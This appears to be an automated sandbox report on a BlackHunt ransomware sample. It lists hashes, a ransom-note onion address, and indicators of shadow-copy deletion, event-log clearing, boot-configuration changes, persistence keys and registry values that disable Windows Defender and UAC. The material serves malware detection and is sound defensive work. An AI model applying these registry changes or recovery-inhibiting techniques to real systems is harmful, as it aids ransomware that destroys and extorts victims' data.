Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:49
Static task
static1
Behavioral task
behavioral1
Sample
27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe
Resource
win10v2004-20231222-en
General
-
Target
27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe
-
Size
707KB
-
MD5
43201e9a58e039425a385f5357a9f8d7
-
SHA1
68c7dc1b13ddeb1050a0f9c31de7d307b0665881
-
SHA256
27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495
-
SHA512
14c68bf8a9dd152695133fc67538127173fde414db2bcd4a68540c432e3ebd78f2b44aab247e33b121cd210f0276111954842117ff4d1d0064e95c00532dbd4b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1m8ovnh:6uaTmkZJ+naie5OTamgEoKxLWVWh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3052 fsutil.exe 1536 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2980 wevtutil.exe 2832 wevtutil.exe 1792 wevtutil.exe 3128 wevtutil.exe 640 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2944 bcdedit.exe 1624 bcdedit.exe 1452 bcdedit.exe 1704 bcdedit.exe -
Renames multiple (2861) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2684 wbadmin.exe 2804 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 780 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\S: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\U: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\J: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\I: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\N: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\M: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\R: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\O: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\A: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\Z: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\X: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\G: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\Y: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\H: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\B: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\T: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\P: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\K: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened (read-only) \??\L: 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\oc\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files (x86)\Google\Update\Install\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\1047x576black.png 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\DVD Maker\audiodepthconverter.ax 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files (x86)\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_left.png 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#BlackHunt_Private.key 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\#BlackHunt_ReadMe.txt 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.hta 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3064 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1632 vssadmin.exe 2504 vssadmin.exe 1420 vssadmin.exe 2152 vssadmin.exe 2704 vssadmin.exe 2104 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2772 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2680 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2468 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeRestorePrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeBackupPrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeTakeOwnershipPrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeAuditPrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeSecurityPrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeIncBasePriorityPrivilege 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Token: SeBackupPrivilege 2652 vssvc.exe Token: SeRestorePrivilege 2652 vssvc.exe Token: SeAuditPrivilege 2652 vssvc.exe Token: SeBackupPrivilege 2384 wbengine.exe Token: SeRestorePrivilege 2384 wbengine.exe Token: SeSecurityPrivilege 2384 wbengine.exe Token: SeSecurityPrivilege 2980 wevtutil.exe Token: SeBackupPrivilege 2980 wevtutil.exe Token: SeSecurityPrivilege 2832 wevtutil.exe Token: SeBackupPrivilege 2832 wevtutil.exe Token: SeSecurityPrivilege 1792 wevtutil.exe Token: SeBackupPrivilege 1792 wevtutil.exe Token: SeSecurityPrivilege 3128 wevtutil.exe Token: SeBackupPrivilege 3128 wevtutil.exe Token: SeSecurityPrivilege 640 wevtutil.exe Token: SeBackupPrivilege 640 wevtutil.exe Token: SeDebugPrivilege 2772 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2316 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 136 PID 2848 wrote to memory of 2316 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 136 PID 2848 wrote to memory of 2316 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 136 PID 2848 wrote to memory of 2316 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 136 PID 2848 wrote to memory of 2564 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 134 PID 2848 wrote to memory of 2564 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 134 PID 2848 wrote to memory of 2564 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 134 PID 2848 wrote to memory of 2564 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 134 PID 2848 wrote to memory of 2616 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 133 PID 2848 wrote to memory of 2616 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 133 PID 2848 wrote to memory of 2616 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 133 PID 2848 wrote to memory of 2616 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 133 PID 2316 wrote to memory of 2676 2316 cmd.exe 131 PID 2316 wrote to memory of 2676 2316 cmd.exe 131 PID 2316 wrote to memory of 2676 2316 cmd.exe 131 PID 2848 wrote to memory of 2688 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 130 PID 2848 wrote to memory of 2688 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 130 PID 2848 wrote to memory of 2688 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 130 PID 2848 wrote to memory of 2688 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 130 PID 2564 wrote to memory of 2696 2564 cmd.exe 30 PID 2564 wrote to memory of 2696 2564 cmd.exe 30 PID 2564 wrote to memory of 2696 2564 cmd.exe 30 PID 2848 wrote to memory of 2672 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 31 PID 2848 wrote to memory of 2672 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 31 PID 2848 wrote to memory of 2672 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 31 PID 2848 wrote to memory of 2672 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 31 PID 2848 wrote to memory of 2624 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 129 PID 2848 wrote to memory of 2624 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 129 PID 2848 wrote to memory of 2624 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 129 PID 2848 wrote to memory of 2624 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 129 PID 2848 wrote to memory of 2716 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 35 PID 2848 wrote to memory of 2716 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 35 PID 2848 wrote to memory of 2716 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 35 PID 2848 wrote to memory of 2716 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 35 PID 2848 wrote to memory of 2880 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 37 PID 2848 wrote to memory of 2880 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 37 PID 2848 wrote to memory of 2880 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 37 PID 2848 wrote to memory of 2880 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 37 PID 2616 wrote to memory of 2060 2616 cmd.exe 128 PID 2616 wrote to memory of 2060 2616 cmd.exe 128 PID 2616 wrote to memory of 2060 2616 cmd.exe 128 PID 2848 wrote to memory of 2748 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 127 PID 2848 wrote to memory of 2748 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 127 PID 2848 wrote to memory of 2748 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 127 PID 2848 wrote to memory of 2748 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 127 PID 2848 wrote to memory of 2444 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 125 PID 2848 wrote to memory of 2444 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 125 PID 2848 wrote to memory of 2444 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 125 PID 2848 wrote to memory of 2444 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 125 PID 2848 wrote to memory of 1780 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 122 PID 2848 wrote to memory of 1780 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 122 PID 2848 wrote to memory of 1780 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 122 PID 2848 wrote to memory of 1780 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 122 PID 2848 wrote to memory of 2480 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 121 PID 2848 wrote to memory of 2480 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 121 PID 2848 wrote to memory of 2480 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 121 PID 2848 wrote to memory of 2480 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 121 PID 2624 wrote to memory of 2488 2624 cmd.exe 142 PID 2624 wrote to memory of 2488 2624 cmd.exe 142 PID 2624 wrote to memory of 2488 2624 cmd.exe 142 PID 2672 wrote to memory of 2500 2672 cmd.exe 39 PID 2672 wrote to memory of 2500 2672 cmd.exe 39 PID 2672 wrote to memory of 2500 2672 cmd.exe 39 PID 2848 wrote to memory of 2516 2848 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe 40 -
System policy modification 1 TTPs 3 IoCs
